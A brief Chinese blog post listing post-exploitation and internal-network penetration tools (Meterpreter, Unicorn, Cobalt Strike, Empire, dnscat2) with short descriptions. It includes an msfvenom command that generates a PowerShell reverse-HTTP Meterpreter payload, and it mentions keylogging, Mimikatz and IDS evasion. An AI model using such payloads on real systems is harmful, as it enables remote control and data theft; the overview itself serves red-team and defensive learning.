内网渗透工具 taro Posted on Mar 17 2021 工具 内网渗透 # Meterpreter ## 混淆 msfvenom -payload windows/x64/meterpreter_reverse_http -format psh -out meterpreter- 64.ps1 LHOST=127.0.0.1 ## Unicorn [Unicorn](https://github.com/trustedsec/unicorn) 基于 PowerShell 的 Meterpreter payload, # Cobalt Strike 用来后期持久渗透,横向移动,流量隐藏、数据窃取的工具(持久远控) # PowerShell Empire Empire 是一个后期漏洞利用的框架,包含一个纯 PowerShell2.0 的 Windows 代理和一个纯 Python 2.6/2.7 的 Linux/OS X 代理。它是以前的 PowerShell Empire 和 Python EmPyre 项目的合并。 该框架提供了加密安全通信和灵活的架构。在 PowerShell 方面,Empire 实现了无需 powershell.exe 就可运行PowerShell代理的功能。并且Empire有很多可以快速部署的后期漏洞利用模块,从键盘记录器到Mimikatz。Empire还可以调整通信,躲避网络检测。所有的这些功能都封装在一个以实用性为重点的框架中。 # dnscat2 利用DNS协议绕过IDS 子域名收集工具 代码审计